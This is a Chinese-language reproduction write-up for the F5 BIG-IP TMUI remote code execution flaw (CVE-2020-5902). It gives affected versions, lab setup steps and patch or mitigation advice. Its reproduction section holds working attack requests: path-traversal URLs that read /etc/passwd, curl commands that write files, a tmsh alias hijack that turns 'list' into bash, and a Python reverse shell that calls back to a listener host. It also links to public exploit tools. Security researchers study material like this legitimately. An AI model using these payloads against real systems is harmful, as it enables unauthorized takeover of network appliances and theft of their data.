0x00簡介
F5 BIG-IP 是美國``F5公司一款內建流量管理、DNS、出入站規則、web應用防火牆、web網關、負載均衡等功能的應用傳遞平台。 在F5 BIG-IP産品的流量管理使用者頁面 (TMUI)/配置程式的特定頁面中存在一處遠端代碼執行漏洞,導緻可以未授權通路TMUI子產品所有功能(包括未公開功能),漏洞影響範圍包括執行任意系統指令、任意檔案讀取、任意檔案寫入、開啟/禁用服務等。
0x02漏洞概述
攻擊者可利用該漏洞執行任意系統指令、建立或删除檔案、禁用服務、執行任意的Java代碼,可擷取shell完全控制目标系統。
0x03影響範圍
F5 BIG‐IP 15.1.0
F5 BIG‐IP 15.0.0
F5 BIG‐IP 14.1.0‐14.1.2
F5 BIG‐IP 13.1.0‐13.1.3
F5 BIG‐IP 12.1.0‐12.1.5
F5 BIG‐IP 11.6.1‐11.6.5
0x04環境搭建
1.在F5官網注冊登入下載下傳試用即可。
https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition
2.然後随便選擇一個下載下傳地區,下載下傳即可
3.下載下傳完成後,使用VMwear導入安裝
VMwear左上角‘檔案’->‘打開‘選擇下載下傳好的檔案
4.配置方面看自己的選擇導入後啟動即可系統預設賬戶:root/default登陸後需要修改預設密碼
5.輸入config,配置配置ip位址,點兩次Enter鍵即可
6.設定完IP後通路一下連結出現登入頁面安裝成功 //注要https加IP
https://172.16.1.186/tmui/login.jsp
0x05漏洞複現
1.登入管理頁面既是漏洞存在的地方,我們使用poc進行測試檔案讀取:
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
2.寫入檔案
curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=東塔網絡安全學院" "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
3.讀取檔案
curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"
- 修改alias劫持list指令為bash
curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
4.1 寫入檔案:bash檔案
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id
4.2 執行bash檔案
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test
注:因為權限不足無法完成此步操作,在實際環境中可以嘗試
5.反彈shell,寫入python反彈shell
https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.16.1.132',7856));<br>os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
使用kali做監聽
執行以下指令反彈shell //沒有權限這裡沒有反彈成功,可在實際環境中測試
6.利用工具
https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902
0x06修複建議
1、官方建議可以通過以下步驟暫時緩解影響(臨時修複方案)
1.1使用以下指令登入對應系統:
tmsh
1.2編輯 httpd 元件的配置檔案;
edit /sys httpd all-properties
1.3檔案内容如下
include ' <LocationMatch "...;."> Redirect 404 / <\/LocationMatch> '
1.4按照如下操作儲存檔案;
按下 ESC 并依次輸入:
wq
1.5執行指令重新整理配置檔案;
save /sys config
1.6重新開機 httpd 服務。
restart sys service httpd
并禁止外部IP對 TMUI 頁面的通路。
2、更新到以下版本
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
參考連結
https://www.cnblogs.com/twosmi1e/p/13290290.html